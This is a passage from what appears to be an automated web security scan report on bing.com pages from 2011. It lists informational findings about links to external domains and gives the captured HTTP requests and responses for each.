https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661410&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fnews%252fsearch%253fq%253dsmall%252bplane%252bmakes%252bemergency%252blanding%252bon%252bnj%252bhighway%2526form%253dmsnhpm%2526alert_showform%253d1&lc=1033&id=264960

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70879
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:30 GMT
Connection: close
Set-Cookie: _SS=SID=5764619496BA40119E677689023EF3BF; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:30 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cd72edb54d9204953b984e3b08f2bfcd9; expires=Fri, 01-Feb-2013 15:43:30 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:30 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,201.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,203.1')">Hotmail</a>
...[SNIP]...
<p class="SignInLink">To sign up for news alerts, you need to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661410&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fnews%252fsearch%253fq%253dsmall%252bplane%252bmakes%252bemergency%252blanding%252bon%252bnj%252bhighway%2526form%253dmsnhpm%2526alert_showform%253d1&lc=1033&id=264960" onmousedown="return si_T('&ID=news,659.1')">sign in</a>
...[SNIP]...
<p class="SignUpLink">Don't have a Windows Live ID? <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661410&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fnews%252fsearch%253fq%253dsmall%252bplane%252bmakes%252bemergency%252blanding%252bon%252bnj%252bhighway%2526form%253dmsnhpm%2526alert_showform%253d1&lc=1033&id=264960" onmousedown="return si_T('&ID=news,659.2')">Sign up</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=news,377.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=news,379.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=news,381.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=news,383.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=news,385.1')">About our ads</a>
...[SNIP]...
<div class="sn_hd"><a href="http://www.postchronicle.com/news/breakingnews/article_212346591.shtml" onmousedown="return si_T('&ID=news,49.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.gather.com/viewArticle.action?articleId=281474979005490" onmousedown="return si_T('&ID=news,53.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://ksax.com/article/stories/S1951677.shtml?cat=10230" onmousedown="return si_T('&ID=news,64.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fksax.com%2fksaxImages%2fplane%2520web2.jpg&id=491ABE181E0552669122C42622C052EA" title="Plane lands on I-80 in NJ; no injuries
...[SNIP]...
<div class="sn_hd"><a href="http://news.yahoo.com/s/nm/20110131/us_nm/us_plane_highway" onmousedown="return si_T('&ID=news,57.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.whec.com/news/stories/S1951718.shtml?cat=566" onmousedown="return si_T('&ID=news,59.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.wpix.com/news/wpix-reports-of-plane-landing-on-nj-highway,0,312021.story" onmousedown="return si_T('&ID=news,61.1')" ><strong>
...[SNIP]...
<span class="vt_con"><a href="http://www.cbsnews.com/video/watch/?id=7305553n" onmousedown="return si_T('&ID=news,73.1')"class="vt_tl" onmouseover="VT.hover(this,'http:\/\/ts1.mm.bing.net\/videos\/thumbnail.aspx?q=2146239496&bid=CATtfzTphsK0BA&bn=MotionThumb&url=http%3a%2f%2fwww.cbsnews.com%2fvideo%2fwatch%2f%3fid%3d7305553n', 0 );" style=" width:120px; height:68px;"><span class="vt_vp">
...[SNIP]...
<div class="sn_hd"><a href="http://www.cbsnews.com/video/watch/?id=7305553n" onmousedown="return si_T('&ID=news,73.2')">Plane Lands on N.J. Highway</a>
...[SNIP]...
<span class="vt_con"><a href="http://www.reuters.com/news/video?videoId=183717816" onmousedown="return si_T('&ID=news,76.1')"class="vt_tl" onmouseover="VT.hover(this,'http:\/\/ts2.mm.bing.net\/videos\/thumbnail.aspx?q=2143085865&bid=KeW8f35gp%2bAb4w&bn=MotionThumb&url=http%3a%2f%2fwww.reuters.com%2fnews%2fvideo%3fvideoId%3d183717816', 0 );" style=" width:120px; height:68px;"><span class="vt_vp">
...[SNIP]...
<div class="sn_hd"><a href="http://www.reuters.com/news/video?videoId=183717816" onmousedown="return si_T('&ID=news,76.2')">Small plane lands safely on New ...</a>
...[SNIP]...
<span class="vt_con"><a href="http://video.ap.org/?f=AP&pid=OnzT_rGa6m76FSGTFEEGhVvVG_HIoePH" onmousedown="return si_T('&ID=news,79.1')"class="vt_tl" onmouseover="VT.hover(this,'http:\/\/ts1.mm.bing.net\/videos\/thumbnail.aspx?q=1106043620&bid=5OLsQRMYJNGi2Q&bn=MotionThumb&url=http%3a%2f%2fvideo.ap.org%2f%3ff%3dAP%26pid%3dOnzT_rGa6m76FSGTFEEGhVvVG_HIoePH', 0 );" style=" width:120px; height:68px;"><span class="vt_vp">
...[SNIP]...
<div class="sn_hd"><a href="http://video.ap.org/?f=AP&pid=OnzT_rGa6m76FSGTFEEGhVvVG_HIoePH" onmousedown="return si_T('&ID=news,79.2')">Raw Video: Plane Lands on N.J. ...</a>
...[SNIP]...
<span class="vt_con"><a href="http://www.cnn.com/video/?/video/us/2011/01/31/vo.nj.plane.towed.news12" onmousedown="return si_T('&ID=news,82.1')"class="vt_tl" onmouseover="VT.hover(this,'http:\/\/ts1.mm.bing.net\/videos\/thumbnail.aspx?q=3994635624&bid=aE0Z7j6DpSEhXg&bn=MotionThumb&url=http%3a%2f%2fwww.cnn.com%2fvideo%2f%3f%2fvideo%2fus%2f2011%2f01%2f31%2fvo.nj.plane.towed.news12', 0 );" style=" width:120px; height:68px;"><span class="vt_vp">
...[SNIP]...
<div class="sn_hd"><a href="http://www.cnn.com/video/?/video/us/2011/01/31/vo.nj.plane.towed.news12" onmousedown="return si_T('&ID=news,82.2')">Plane towed from NJ road</a>
...[SNIP]...
<span class="vt_con"><a href="http://www.cnn.com/video/?/video/us/2011/01/31/vosil.nj.plane.on.interstate.80.wabc" onmousedown="return si_T('&ID=news,85.1')"class="vt_tl" onmouseover="VT.hover(this,'http:\/\/ts3.mm.bing.net\/videos\/thumbnail.aspx?q=4004359554&bid=gq2t7uOa8gU31w&bn=MotionThumb&url=http%3a%2f%2fwww.cnn.com%2fvideo%2f%3f%2fvideo%2fus%2f2011%2f01%2f31%2fvosil.nj.plane.on.interstate.80.wabc', 0 );" style=" width:120px; height:68px;"><span class="vt_vp">
...[SNIP]...
<div class="sn_hd"><a href="http://www.cnn.com/video/?/video/us/2011/01/31/vosil.nj.plane.on.interstate.80.wabc" onmousedown="return si_T('&ID=news,85.2')">Plane lands on Interstate 80 in NJ</a>
...[SNIP]...
<div class="sn_hd"><a href="http://www.nj.com/news/index.ssf/2011/01/small_plane_headed_for_teterbo.html" onmousedown="return si_T('&ID=news,88.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.msnbc.msn.com/id/41356396" onmousedown="return si_T('&ID=news,92.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.courierpostonline.com/article/20110131/NEWS02/110131070/Small-plane-makes-emergency-landing-on-N-J-highway" onmousedown="return si_T('&ID=news,96.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.dbtechno.com/curiosity/2011/02/01/plan-makes-emergency-landing-on-new-jersey-highway-due-to-mechanical-issues/" onmousedown="return si_T('&ID=news,100.1')" >Plan <strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.dbtechno.com/uncategorized/2011/02/01/chicago-midwest-prepare-for-snow-storm/" onmousedown="return si_T('&ID=news,104.1')" >Chicago, Midwest prepare For Snow Storm</a>
...[SNIP]...
<div class="sn_hd"><a href="http://www.gather.com/viewArticle.action?articleId=281474979008340" onmousedown="return si_T('&ID=news,3.1')" >Holy Blizzard Batman!!!!</a>
...[SNIP]...
<div class="sn_hd"><a href="http://www.northjersey.com/news/business/stocks020111.html" onmousedown="return si_T('&ID=news,7.1')" >Dow over 12,000 as remarkable bull market rolls on</a>
...[SNIP]...
<div class="sn_hd"><a href="http://www.cbsnews.com/8301-503544_162-20030276-503544.html" onmousedown="return si_T('&ID=news,11.1')" >Planned Parenthood Under Fire Over New Video</a>
...[SNIP]...
<div class="sn_hd"><a href="http://www.thaindian.com/newsportal/business/citigroup-acquires-emi-and-reduces-debt-by-65-percent_100496945.html" onmousedown="return si_T('&ID=news,16.1')" >Citigroup acquires EMI and reduces debt by 65 percent</a>
...[SNIP]...
<div class="sn_hd"><a href="http://www.dbtechno.com/uncategorized/2011/02/01/chicago-midwest-prepare-for-snow-storm/" onmousedown="return si_T('&ID=news,20.1')" >Chicago, Midwest prepare For Snow Storm</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,215.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,217.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,219.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,221.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,223.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,225.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchnews&P1=dsatnews&P2=small+plane+makes+emergency+landing+on+nj+highway&P3=0&P4=msnhpm&P5=F741A5D3C8544F77A0B57D8439E7E06E&P6=Washington%2c+District+Of+Columbia&P7=Original&P8=&P9=38.9069%2f-77.0284&P10=24902&P11=&P12=&searchtype=News+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2fnews%2fsearch%3fq%3dsmall%2bplane%2bmakes%2bemergency%2blanding%2bon%2bnj%2bhighway%26FORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&ID=FD,227.1')">Tell us what you think</a>
...[SNIP]...

17.228. http://www.bing.com/travel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV

The response contains the following links to other domains:

http://ad.doubleclick.net/clk;201900517;26579808;j?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=ski&cnt=PKH&gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=ski
http://ad.doubleclick.net/clk;201900520;26579808;d?http://www.orbitz.com/App/PrepareDealsHome?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=dealspage
http://ad.doubleclick.net/clk;201900522;26579808;f?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=HI&cnt=PRO
http://ad.doubleclick.net/clk;201900522;26579808;f?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=vacation-rentals&gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=rentals
http://ad.doubleclick.net/clk;214236123;36139234;u?http://www.orbitz.com/App/DisplayCarSearch?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=cars
http://ad.doubleclick.net/clk;214236160;36139297;e?http://cruises.orbitz.com?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=cruises
http://ad.doubleclick.net/clk;214236226;36139480;b?http://www.orbitz.com/App/PrepareVacationsHome?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=vacations
http://ads1.msn.com/library/dap.js
http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://moneycentral.msn.com/investor/market/currencyconverter.aspx
http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx
http://twitter.com/fareologist
http://www.facebook.com/Bing?v=app_131774473518765
http://www.msn.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 88431
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:37 GMT
Connection: close
Set-Cookie: lbc=914; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-kn9rba4tmh4byz7aru4ncjhjrr6_VID-z1ardgqj2preelyz6fq87n8dokpko_UID-; Domain=.bing.com; Expires=Fri, 01-Feb-2013 15:43:37 GMT; Path=/travel
Set-Cookie: JSESSIONID=F9A5BDF8554B5A521E4ADD0F53F06045; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=914A77BB8D3B44F08D853573E93F3935; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:37 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cce78c16cfad246628701c059bb2c872b; expires=Fri, 01-Feb-2013 15:43:37 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:37 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,79.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,81.1')">Hotmail</a>
...[SNIP]...
<li>
                                    <a rel="nofollow" href="http://ad.doubleclick.net/clk;214236123;36139234;u?http://www.orbitz.com/App/DisplayCarSearch?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=cars" target="_cars" class="FCEVENT_track_DOBUBBLE_BookingModule-link1">Cars</a>
...[SNIP]...
<li>
                                    <a rel="nofollow" href="http://ad.doubleclick.net/clk;214236160;36139297;e?http://cruises.orbitz.com?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=cruises" target="_cruises" class="FCEVENT_track_DOBUBBLE_BookingModule-link2">Cruises</a>
...[SNIP]...
<li>
                                    <a rel="nofollow" href="http://ad.doubleclick.net/clk;214236226;36139480;b?http://www.orbitz.com/App/PrepareVacationsHome?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=vacations" target="_vacations" class="FCEVENT_track_DOBUBBLE_BookingModule-link3">Vacations</a>
...[SNIP]...
<li>
       <a rel="nofollow" target="_blank" href="http://ad.doubleclick.net/clk;201900517;26579808;j?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=ski&cnt=PKH&gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=ski" class="FCEVENT_track_DOBUBBLE_PartnerDeals-link1">Save up to 40% on ski packages</a>
...[SNIP]...
<li>
       <a rel="nofollow" target="_blank" href="http://ad.doubleclick.net/clk;201900522;26579808;f?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=HI&cnt=PRO" class="FCEVENT_track_DOBUBBLE_PartnerDeals-link2">Great deals to Hawaii</a>
...[SNIP]...
<li>
       <a rel="nofollow" target="_blank" href="http://ad.doubleclick.net/clk;201900522;26579808;f?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=vacation-rentals&gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=rentals" class="FCEVENT_track_DOBUBBLE_PartnerDeals-link3">Find the perfect vacation rental</a>
...[SNIP]...
<li class="more deals">
       <a rel="nofollow" target="_blank" href="http://ad.doubleclick.net/clk;201900520;26579808;d?http://www.orbitz.com/App/PrepareDealsHome?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=dealspage" class="FCEVENT_track_DOBUBBLE_PartnerDeals-link4">More top deals by <img src="images/orbitzLogoSmall.gif">
...[SNIP]...
<li>
       <a rel="nofollow" href="http://twitter.com/fareologist" class="FCEVENT_track_DOBUBBLE_Tools-link1">Bing travel on Twitter</a>
...[SNIP]...
<li>
       <a rel="nofollow" href="http://www.facebook.com/Bing?v=app_131774473518765" class="FCEVENT_track_DOBUBBLE_Tools-link2">Bing travel on Facebook</a>
...[SNIP]...
<li>
       <a rel="nofollow" href="http://moneycentral.msn.com/investor/market/currencyconverter.aspx" class="FCEVENT_track_DOBUBBLE_Tools-link5">Currency converter</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,92.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,94.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,96.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,98.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,100.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,102.1')">Help</a>
...[SNIP]...

17.229. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/travel/content/search?q=World's+Cheapest+Destinations%3a+India&cid=msntab1138076&form=TRVCON

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js
http://adsyndication.msn.com/delivery/getads.js
http://advertising.microsoft.com/advertise-on-bing
http://cc.bingj.com/cache.aspx?q=india+travel&d=4606159318223552&mkt=en-US&w=93ad5a59,32724e6a
http://cc.bingj.com/cache.aspx?q=india+travel&d=4753184638568059&mkt=en-US&w=a73f04e9,9dd9ac20
http://cc.bingj.com/cache.aspx?q=india+travel&d=5047600350104075&mkt=en-US&w=92430b86,97bafd9d
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://india-travel.com/
http://indiatravel.com/
http://mail.live.com/
http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx
http://www.associatedcontent.com/article/7706335/north_east_india_fusion_of_beauty_heritage.html
http://www.bloomberg.com/news/2011-02-02/jet-airways-net-income-gains-on-india-travel-demand-update1-.html
http://www.facebook.com/plugins/like.php?href=http://www.bing.com/travel/content/search?q=World's+Cheapest+Destinations%3a+India&layout=standard&show_faces=false&width=250&action=like&colorscheme=dark&height=35
http://www.lonelyplanet.com/india
http://www.moneycontrol.com/news/press-release/axis-bank-launches-india-travel-card_518901.html
http://www.msn.com/
http://www.prlog.org/11236465-find-best-india-travel-deals.html

Request

GET /travel/content/search?q=World's+Cheapest+Destinations%3a+India&cid=msntab1138076&form=TRVCON HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 53533
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:40 GMT
Connection: close
Set-Cookie: JSESSIONID=BDD2919A6479571B07495F38244D37EE; Path=/travel
Set-Cookie: _SS=SID=F89DDB9B8F67443CA999741BA6EB8AC9; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:39 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce4741af45ad64c309d08cf3a1bc1012e; expires=Fri, 01-Feb-2013 15:43:39 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:40 GMT; domain=.bing.com; path=/

                       <!DOCTYPE HTML PUBLIC "-//W3C//DT
...[SNIP]...
</script>


<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,75.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,77.1')">Hotmail</a>
...[SNIP]...
</div>


                                                                                            <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.bing.com/travel/content/search?q=World's+Cheapest+Destinations%3a+India&layout=standard&show_faces=false&width=250&action=like&colorscheme=dark&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:250px; height:35px;" allowTransparency="true"></iframe>
...[SNIP]...
<li>
                                               <a href="http://www.bloomberg.com/news/2011-02-02/jet-airways-net-income-gains-on-india-travel-demand-update1-.html">Jet Airways Net Income Gains on India Travel Demand</a>
...[SNIP]...
<li>
                                               <a href="http://www.prlog.org/11236465-find-best-india-travel-deals.html">Find Best India Travel Deals</a>
...[SNIP]...
<li>
                                               <a href="http://www.associatedcontent.com/article/7706335/north_east_india_fusion_of_beauty_heritage.html">North East India: Fusion of Beauty, Heritage and Serenity</a>
...[SNIP]...
<li>
                                               <a href="http://www.moneycontrol.com/news/press-release/axis-bank-launches-india-travel-card_518901.html">Axis Bank launches India Travel Card</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.lonelyplanet.com/india">India Travel Information and Travel Guide - Lonely Planet</a>
...[SNIP]...
</cite> ·
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=india+travel&d=5047600350104075&mkt=en-US&w=92430b86,97bafd9d">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://indiatravel.com/">IndiaTravel.Com Your virtual… Passage to India</a>
...[SNIP]...
</cite> ·
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=india+travel&d=4753184638568059&mkt=en-US&w=a73f04e9,9dd9ac20">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://india-travel.com/">Indian Travel Agent and tour Operators, Travelling in India, India ...</a>
...[SNIP]...
</cite> ·
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=india+travel&d=4606159318223552&mkt=en-US&w=93ad5a59,32724e6a">Cached page</a>
...[SNIP]...
</script>

<script src="http://adsyndication.msn.com/delivery/getads.js"
   type="text/javascript">

</script>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,88.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,90.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,92.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,94.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,96.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,98.1')">Help</a>
...[SNIP]...

17.230. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/travel/content/search?q=Indoor+Water+Parks%3a+Wilderness+Territory+Waterpark+Resort&cid=msntab1176403&FORM=TRVCON

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js
http://adsyndication.msn.com/delivery/getads.js
http://advertising.microsoft.com/advertise-on-bing
http://cc.bingj.com/cache.aspx?q=wilderness+territory+waterpark+resort+wisconsin+dells&d=4697010760778763&mkt=en-US&w=32a02586,476435a0
http://cc.bingj.com/cache.aspx?q=wilderness+territory+waterpark+resort+wisconsin+dells&d=4776175598635299&mkt=en-US&w=2528275d,e78fa00a
http://cc.bingj.com/cache.aspx?q=wilderness+territory+waterpark+resort+wisconsin+dells&d=4885830404539621&mkt=en-US&w=9a57c58,688bda2e
http://en.wikipedia.org/wiki/Wilderness_Territory
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx
http://www.associatedcontent.com/article/7695098/the_best_waterparks_in_wisconsin_dells.html
http://www.biztimes.com/daily/2011/1/31/biztimes-wisconsin-morning-headlines-wisconsin-dells-theme-park-owners-invest-in-the-strip
http://www.budgettravel.com/
http://www.budgettravel.com/bt-srv/gallery/1011_WeirdestHotels/index.html?jumpToPic=0
http://www.budgettravel.com/bt-srv/gallery/1012_AirportLandings/index.html?jumpToPic=0
http://www.dailycardinal.com/news/wisconsin-dells-woman-overdoses-with-1-year-old-son-in-car-1.1903976
http://www.facebook.com/plugins/like.php?href=http://www.bing.com/travel/content/search?q=Indoor+Water+Parks%3a+Wilderness+Territory+Waterpark+Resort&layout=standard&show_faces=false&width=250&action=like&colorscheme=dark&height=35
http://www.msn.com/
http://www.wildernessresort.com/
http://www.wildernessterritory.com/
http://www.wiscnews.com/portagedailyregister/sports/high-school/basketball/article_35888618-25ec-11e0-9ed3-001cc4c03286.html

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 59583
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:38 GMT
Connection: close
Set-Cookie: JSESSIONID=DB382E42EC1C6F1A2AEB3183FD02334F; Path=/travel
Set-Cookie: _SS=SID=B9FD2F05CE624E8D8225D133EB9C4444; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:38 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2b76bfd18f8b4505beb02a52509d49a9; expires=Fri, 01-Feb-2013 15:43:38 GMT; domain=.bing.com; path=/
